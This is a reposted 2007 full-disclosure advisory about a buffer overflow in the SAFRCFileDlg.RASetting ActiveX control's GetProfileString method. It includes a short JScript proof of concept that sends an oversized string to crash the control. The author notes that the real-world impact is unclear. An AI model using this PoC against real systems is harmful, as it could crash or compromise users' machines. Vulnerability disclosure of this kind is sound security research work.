SecurityHome.eu Security vulnerability: safrcdlg-overflow.txt

Home / vulnerabilities PDF

safrcdlg-overflow.txt
Posted on 13 November 2007
Source : packetstormsecurity.org Link

The GetProfileString function of the SAFRCFileDlg.RASetting control contains a buffer overflow. This control is NOT marked safe for scripting, and seems to execute in the context of the user, so I am not sure what can be done maliciously with this. Never the less, it is a buffer overflow. PoC as follows:

------------------
//written by e.b.
var s = "AAAA";
while (s.length < 999 * 999) s=s+s;

var obj = new ActiveXObject("SAFRCFileDlg.RASetting");

obj.GetProfileString(s);
------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20